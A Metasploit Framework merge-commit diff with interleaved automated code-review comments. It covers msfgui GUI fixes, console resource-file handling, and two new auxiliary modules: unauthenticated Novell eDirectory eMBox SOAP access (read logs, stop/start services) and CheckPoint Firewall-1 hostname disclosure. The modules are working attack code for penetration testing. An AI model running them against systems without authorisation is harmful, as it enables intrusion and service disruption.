Merge remote branch 'upstream/master'
commit
df0abd0273
Binary file not shown.
|
@ -265,6 +265,7 @@ public class DbConnectDialog extends OptionsDialog {
|
|||
token = s.next();
|
||||
}
|
||||
} catch (FileNotFoundException fnfox){
|
||||
fnfox.printStackTrace();
|
||||
}
|
||||
showDefaults();
|
||||
}
|
||||
|
|
|
@ -265,6 +265,7 @@ public class MainFrame extends FrameView {
|
|||
}
|
||||
publish((Object)jobStrings);
|
||||
} catch (MsfException msfEx) {
|
||||
if(!MsfguiApp.shuttingDown || !msfEx.getMessage().contains("Connection refused"))
|
||||
msfEx.printStackTrace();
|
||||
publish("Error getting session list "+msfEx);
|
||||
if(!msfEx.getMessage().contains("timed out")) // on timeout, just retry
|
||||
|
@ -1655,6 +1656,7 @@ nameloop: for (int i = 0; i < names.length; i++) {
|
|||
});
|
||||
jobsList.addMouseListener( new PopupMouseListener() {
|
||||
public void mouseReleased(MouseEvent e){
|
||||
super.mouseReleased(e);
|
||||
int indx = jobsList.locationToIndex(e.getPoint());
|
||||
if (indx == -1)
|
||||
return;
|
||||
|
|
|
@ -3,8 +3,6 @@ package msfgui;
|
|||
import java.awt.Component;
|
||||
import java.awt.event.ActionEvent;
|
||||
import java.awt.event.ActionListener;
|
||||
import java.awt.event.FocusEvent;
|
||||
import java.awt.event.FocusListener;
|
||||
import java.awt.event.MouseEvent;
|
||||
import java.io.File;
|
||||
import java.io.IOException;
|
||||
|
@ -199,7 +197,6 @@ public class MeterpFileBrowser extends MsfFrame {
|
|||
/** Retrieves list of files. */
|
||||
private void getFiles() {
|
||||
//Set up locking so the console doesn't eat our output
|
||||
if(!lock.tryLock())
|
||||
lock.lock();
|
||||
|
||||
while(model.getRowCount() > 0)
|
||||
|
@ -243,10 +240,8 @@ public class MeterpFileBrowser extends MsfFrame {
|
|||
for(int i = 0; i < mainTable.getColumnCount(); i++)
|
||||
if(mainTable.getColumnName(i).equals("Name"))
|
||||
nameColumn = i;
|
||||
if(nameColumn != -1){
|
||||
if(nameColumn != -1)
|
||||
mainTable.moveColumn(nameColumn, 0);
|
||||
stop();
|
||||
}
|
||||
} catch (Exception ex) {
|
||||
ex.printStackTrace();
|
||||
if(ex.getMessage().toLowerCase().contains("unknown session"))
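Review bot: In the `catch (Exception ex)` branch, `ex.getMessage().toLowerCase()` is called without a null check, and many exceptions (a bare NullPointerException, for instance) carry no message. In that case the handler itself throws and the "unknown session" test is never reached. A guard such as `String msg = ex.getMessage(); if(msg != null && msg.toLowerCase().contains("unknown session"))` keeps the handler total. The +/- markers are lost on this page, so this line may be context rather than new, and the method continues outside the hunk.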
|
||||
|
|
|
@ -103,7 +103,6 @@ public class OpenConnectionDialog extends javax.swing.JDialog {
|
|||
String host = info.get("host").toString();
|
||||
int port = Integer.parseInt(info.get("port").toString());
|
||||
boolean ssl = Boolean.parseBoolean(info.get("ssl").toString());
|
||||
String type = info.get("type").toString();
|
||||
RpcConnection rpc = RpcConnection.getConn(username, password.toCharArray(), host, port, ssl);
|
||||
if(javax.swing.JOptionPane.showConfirmDialog(null, "Connect to last remembered rpcd?") == javax.swing.JOptionPane.YES_OPTION)
|
||||
return rpc;
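Review bot: `RpcConnection.getConn(username, password.toCharArray(), host, port, ssl)` runs before the `showConfirmDialog(null, "Connect to last remembered rpcd?")` prompt. The remembered credentials therefore appear to be used against the stored host whatever the user answers, and on any answer other than yes the `rpc` object is simply dropped. Asking first and calling `getConn` only inside the YES branch would make the prompt an actual consent step and avoid an abandoned connection. What `getConn` does on the wire is not visible here, and the method continues outside the hunk.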
|
||||
|
|
|
@ -57,16 +57,6 @@ public class ProcessList extends MsfFrame {
|
|||
this.rpcConn = rpcConn;
|
||||
this.session = session;
|
||||
this.lock = (ReentrantLock)sessionPopupMap.get(session.get("id")+"lock");
|
||||
((DraggableTabbedPane)tabbedPane).setTabFocusListener(0, new FocusListener() {
|
||||
public void focusGained(FocusEvent e) {
|
||||
if(!lock.tryLock())
|
||||
lock.lock();
|
||||
}
|
||||
public void focusLost(FocusEvent e) {
|
||||
while(lock.getHoldCount() > 0)
|
||||
lock.unlock();
|
||||
}
|
||||
});
|
||||
//See if we need to move our tab
|
||||
Map props = MsfguiApp.getPropertiesNode();
|
||||
if(!props.get("tabWindowPreference").equals("window")){
|
||||
|
@ -74,13 +64,12 @@ public class ProcessList extends MsfFrame {
|
|||
(Component)sessionPopupMap.get(session.get("id")+"console")));
|
||||
DraggableTabbedPane.show(mainPanel);
|
||||
}
|
||||
if(!lock.tryLock())
|
||||
lock.lock();
|
||||
listProcs();
|
||||
}
|
||||
|
||||
/** Lists the processes that are running */
|
||||
protected void listProcs() throws HeadlessException {
|
||||
lock.lock();
|
||||
if (runCommand("ps"))
|
||||
return;
|
||||
readTimer = new Timer(300, new ActionListener() {
|
||||
|
@ -113,6 +102,7 @@ public class ProcessList extends MsfFrame {
|
|||
readTimer.stop();
|
||||
MsfguiApp.showMessage(null, ex.getMessage());
|
||||
}
|
||||
lock.unlock();
|
||||
}
|
||||
});
|
||||
readTimer.start();
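Review bot: In `listProcs`, `lock.lock()` is followed directly by `if (runCommand("ps")) return;`, and that early return leaves the session lock held, because the only visible `lock.unlock()` sits at the end of the Timer's ActionListener. Releasing on that path, `if (runCommand("ps")) { lock.unlock(); return; }`, would close the gap. The lock is also taken in `listProcs` but released in the timer callback, and a ReentrantLock must be unlocked by the thread that owns it, so this only works if `listProcs` always runs on the Swing event thread, which cannot be confirmed from these hunks. Whether the 300 ms timer is stopped before its next tick reaches `lock.unlock()` again is also outside the visible lines. A short comment on `listProcs` stating the lock hand-off would help.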
|
||||
|
|
|
@ -185,19 +185,61 @@ class Core
|
|||
cmd_resource_help
|
||||
return false
|
||||
end
|
||||
|
||||
args.each do |res|
|
||||
if not File.file? res
|
||||
good_res = nil
|
||||
if (File.file? res and File.readable? res)
|
||||
good_res = res
|
||||
elsif
|
||||
# let's check to see if it's in the scripts/resource dir (like when tab completed)
|
||||
[
|
||||
::Msf::Config.script_directory + File::SEPARATOR + "resource",
|
||||
::Msf::Config.user_script_directory + File::SEPARATOR + "resource"
|
||||
].each do |dir|
|
||||
res_path = dir + File::SEPARATOR + res
|
||||
if (File.file?(res_path) and File.readable?(res_path))
|
||||
good_res = res_path
|
||||
break
|
||||
end
|
||||
end
|
||||
end
|
||||
if good_res
|
||||
driver.load_resource(good_res)
|
||||
else
|
||||
print_error("#{res} is not a valid resource file")
|
||||
next
|
||||
end
|
||||
driver.load_resource(res)
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Tab completion for the resource command
|
||||
#
|
||||
def cmd_resource_tabs(str, words)
|
||||
return [] if words.length > 1
|
||||
|
||||
tab_complete_filenames(str, words)
|
||||
tabs = []
|
||||
#return tabs if words.length > 1
|
||||
if ( str and str =~ /^#{Regexp.escape(File::SEPARATOR)}/ )
|
||||
# then you are probably specifying a full path so let's just use normal file completion
|
||||
return tab_complete_filenames(str,words)
|
||||
elsif (not words[1] or not words[1].match(/^\//))
|
||||
# then let's start tab completion in the scripts/resource directories
|
||||
begin
|
||||
[
|
||||
::Msf::Config.script_directory + File::SEPARATOR + "resource",
|
||||
::Msf::Config.user_script_directory + File::SEPARATOR + "resource"
|
||||
].each do |dir|
|
||||
next if not ::File.exist? dir
|
||||
tabs += ::Dir.new(dir).find_all { |e|
|
||||
path = dir + File::SEPARATOR + e
|
||||
::File.file?(path) and File.readable?(path)
|
||||
}
|
||||
end
|
||||
rescue Exception
|
||||
end
|
||||
else
|
||||
tabs += tab_complete_filenames(str,words)
|
||||
end
|
||||
return tabs
|
||||
end
|
||||
|
||||
def cmd_makerc_help
|
||||
|
@ -902,7 +944,7 @@ class Core
|
|||
if (path !~ /#{File::SEPARATOR}/)
|
||||
plugin_file_name = path
|
||||
|
||||
# If the plugin isn't in the user direcotry (~/.msf3/plugins/), use the base
|
||||
# If the plugin isn't in the user directory (~/.msf3/plugins/), use the base
|
||||
path = Msf::Config.user_plugin_directory + File::SEPARATOR + plugin_file_name
|
||||
if not File.exists?( path + ".rb" )
|
||||
# If the following "path" doesn't exist it will be caught when we attempt to load
|
||||
|
@ -2132,7 +2174,7 @@ class Core
|
|||
# Returns the revision of the framework and console library
|
||||
#
|
||||
def cmd_version(*args)
|
||||
ver = "$Revision$"
|
||||
ver = "$Revision: 14065 $"
|
||||
|
||||
print_line("Framework: #{Msf::Framework::Version}.#{Msf::Framework::Revision.match(/ (.+?) \$/)[1]}")
|
||||
print_line("Console : #{Msf::Framework::Version}.#{ver.match(/ (.+?) \$/)[1]}")
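Review bot: In `cmd_resource` the `elsif` carries no condition of its own, so Ruby parses the following `[ ... ].each do |dir|` expression as the condition. The directory search still runs, but only as a side effect of evaluating that condition, and the branch body is empty; `else` is what is meant. In `cmd_resource_tabs` the bare `rescue Exception` with an empty body hides every failure, including interrupts. Rescuing a narrower class such as `::SystemCallError` would keep the best-effort directory listing without masking real errors. That method also tests `words[1].match(/^\//)` with a hard-coded slash, while the branch above uses `Regexp.escape(File::SEPARATOR)`.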
|
||||
|
|
|
@ -0,0 +1,156 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Novell eDirectory eMBox Unauthenticated File Access',
|
||||
'Description' => %q{
|
||||
This module will access Novell eDirectory's eMBox service and can run the
|
||||
following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,
|
||||
STOP_SERVICE, START_SERVICE, SET_LOGFILE.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2008-0926' ],
|
||||
[ 'BID', '28441' ],
|
||||
[ 'OSVDB', '43690' ]
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Nicob',
|
||||
'MC', #Initial Metasploit module
|
||||
'sinn3r'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Actions' =>
|
||||
[
|
||||
[
|
||||
'GET_DN',
|
||||
{
|
||||
'Description' => 'Get DN',
|
||||
'CMD' => 'novell.embox.connmgr.serverinfo',
|
||||
'PATTERN' => /<ServerDN dt="Binary">(.*)<\/ServerDN>/,
|
||||
'USE_PARAM' => false
|
||||
}
|
||||
],
|
||||
[
|
||||
'READ_LOGS',
|
||||
{
|
||||
'Description' => 'Read all the log files',
|
||||
'CMD' => 'logger.readlog',
|
||||
'PATTERN' => /<LogFileData>(.*)<\/LogFileData>/,
|
||||
'USE_PARAM' => false
|
||||
}
|
||||
],
|
||||
[
|
||||
'LIST_SERVICES',
|
||||
{
|
||||
'Description' => 'List services',
|
||||
'CMD' => 'novell.embox.service.getServiceList',
|
||||
'PATTERN' => /<DSService:Message dt=\"Binary\">(.*)<\/DSService:Message>/,
|
||||
'USE_PARAM' => false
|
||||
}
|
||||
],
|
||||
[
|
||||
'STOP_SERVICE',
|
||||
{
|
||||
'Description' => 'Stop a service',
|
||||
'CMD' => 'novell.embox.service.stopService',
|
||||
'PATTERN' => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
|
||||
'PARAM' => '<Parameters><params xmlns:DSService="service.dtd">'+
|
||||
'<DSService:moduleName>__PARAM__</DSService:moduleName>'+
|
||||
'</params></Parameters>',
|
||||
'USE_PARAM' => true
|
||||
}
|
||||
],
|
||||
[
|
||||
'START_SERVICE',
|
||||
{
|
||||
'Description' => 'Start a service',
|
||||
'CMD' => 'novell.embox.service.startService',
|
||||
'PATTERN' => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
|
||||
'PARAM' => '<Parameters>' +
|
||||
'<params xmlns:DSService="service.dtd">' +
|
||||
'<DSService:moduleName>__PARAM__</DSService:moduleName>'+
|
||||
'</params></Parameters>',
|
||||
'USE_PARAM' => true
|
||||
}
|
||||
],
|
||||
[
|
||||
'SET_LOGFILE',
|
||||
{
|
||||
'Description' => 'Read Log File',
|
||||
'CMD' => 'logger.setloginfo',
|
||||
'PATTERN' => /<Logger:Message dt="Binary">(.*)<\/Logger:Message>/,
|
||||
'PARAM' => '<Parameters><params><logFile>__PARAM__</logFile>'+
|
||||
'<logOptionAppend/></params></Parameters>',
|
||||
'USE_PARAM' => true
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultAction' => 'LIST_SERVICES'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8028),
|
||||
OptString.new("PARAM", [false, 'Specify a parameter for the action'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
if action.opts['USE_PARAM']
|
||||
if datastore['PARAM'].nil? or datastore['PARAM'].empty?
|
||||
print_error("You must supply a parameter for action: #{action.name}")
|
||||
return
|
||||
else
|
||||
param = action.opts['PARAM'].gsub(/__PARAM__/, datastore['PARAM'])
|
||||
end
|
||||
else
|
||||
param = '<Parameters><params/></Parameters>'
|
||||
end
|
||||
|
||||
template = %Q|<?xml version="1.0"?>
|
||||
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
<SOAP-ENV:Header/>
|
||||
<SOAP-ENV:Body>
|
||||
<dispatch>
|
||||
<Action>#{action.opts['CMD']}</Action>
|
||||
<Object/>#{param}</dispatch>
|
||||
</SOAP-ENV:Body>
|
||||
</SOAP-ENV:Envelope>|
|
||||
|
||||
template = template.gsub(/^\t\t/, '')
|
||||
template = template.gsub(/\n/, '')
|
||||
|
||||
connect
|
||||
print_status("Sending command: #{action.name}...")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => '/SOAP',
|
||||
'data' => template + "\n\n",
|
||||
'headers' =>
|
||||
{
|
||||
'Content-Type' => 'text/xml',
|
||||
'SOAPAction' => "\"" + Rex::Text.rand_text_alpha_upper(rand(25) + 1) + "\"",
|
||||
}
|
||||
}, 25)
|
||||
|
||||
raw_data = res.body.scan(/#{action.opts['PATTERN']}/).flatten[0]
|
||||
print_line("\n" + Rex::Text.decode_base64(raw_data))
|
||||
|
||||
disconnect
|
||||
end
|
||||
end
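Review bot: `run` dereferences `res.body` and passes `raw_data` to `Rex::Text.decode_base64` without checking either. A timed-out request (`res` is nil) or a reply that does not match the action's PATTERN (`raw_data` is nil) therefore ends in a NoMethodError rather than a readable message. Guards such as `return print_error("No response") if res.nil?` and `return print_error("Unexpected reply") if raw_data.nil?` would cover both cases. `disconnect` would then belong in an `ensure` so the socket is closed on every path. Separately, the SET_LOGFILE action is described as 'Read Log File' although its CMD is `logger.setloginfo`. The Description text could also state which actions change state on the target (STOP_SERVICE, START_SERVICE, SET_LOGFILE) and which only read.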
|
|
@ -0,0 +1,69 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'CheckPoint Firewall-1 Topology Service Hostname Disclosure',
|
||||
'Description' => %q{
|
||||
This module sends a query to the TCP port 264 on CheckPoint
|
||||
firewalls to obtain the firewall name and management station
|
||||
(such as SmartCenter) name.
|
||||
},
|
||||
'Author' => [ 'patrick' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
# patrickw - None? Stumbled across, probably an old bug/feature but unsure.
|
||||
[ 'URL', 'http://www.osisecurity.com.au/advisories/' ],
|
||||
]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(264),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def run
|
||||
print_status("Attempting to contact Checkpoint FW1 Topology service...")
|
||||
connect
|
||||
|
||||
sock.put("\x51\x00\x00\x00")
|
||||
sock.put("\x00\x00\x00\x21")
|
||||
res = sock.get(4)
|
||||
if (res == "Y\x00\x00\x00")
|
||||
print_good("Appears to be a CheckPoint Firewall...")
|
||||
sock.put("\x00\x00\x00\x0bsecuremote\x00")
|
||||
res = sock.get_once
|
||||
if (res =~ /CN\=(.+),O\=(.+)\./i)
|
||||
print_good("Firewall Host: #{$1}")
|
||||
print_good("SmartCenter Host: #{$2}")
|
||||
end
|
||||
else
|
||||
print_error("Unexpected response:\r\n#{res}")
|
||||
end
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
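Review bot: After the "Appears to be a CheckPoint Firewall..." line, a second reply that does not match `/CN\=(.+),O\=(.+)\./i` produces no output at all, so the operator cannot tell an empty read from an unparsable one. An `else` with `print_error("Unexpected response:\r\n#{res}")`, mirroring the outer branch, would make that visible. Both captures are greedy `(.+)`, so a reply containing more than one `,O=` or several dots will attribute text to the wrong field. `([^,]+)` for the first group is tighter. `disconnect` is only reached on the normal path; an `ensure` would close the socket when `sock.get` or `sock.get_once` raises.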
|
|
@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '77556'],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/18213/' ],
|
||||
[ 'URL', 'http://traqproject.org/' ],
|
||||
],
|
||||
|
|
|
@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '77387'],
|
||||
[ 'URL', 'http://aluigi.altervista.org/adv/codesys_1-adv.txt' ],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/18187/' ],
|
||||
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-336-01A.pdf' ]
|
||||
|
|
|
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Post
|
|||
if not ::File.exists?(datastore['RESOURCE'])
|
||||
raise "Resource File does not exists!"
|
||||
else
|
||||
::File.open(datastore['RESOURCE'], "br").each_line do |cmd|
|
||||
::File.open(datastore['RESOURCE'], "rb").each_line do |cmd|
|
||||
next if cmd.strip.length < 1
|
||||
next if cmd[0,1] == "#"
|
||||
begin
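Review bot: `::File.open(datastore['RESOURCE'], "rb").each_line` opens the file without a block, so the handle is never closed explicitly and stays open until garbage collection. The block form, `::File.open(datastore['RESOURCE'], "rb") { |f| f.each_line do |cmd| ... end }`, closes it as soon as the loop finishes or raises. The error string on the line above reads "does not exists"; "does not exist" is the intended wording. The loop body continues outside the hunk.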
|
||||
|
|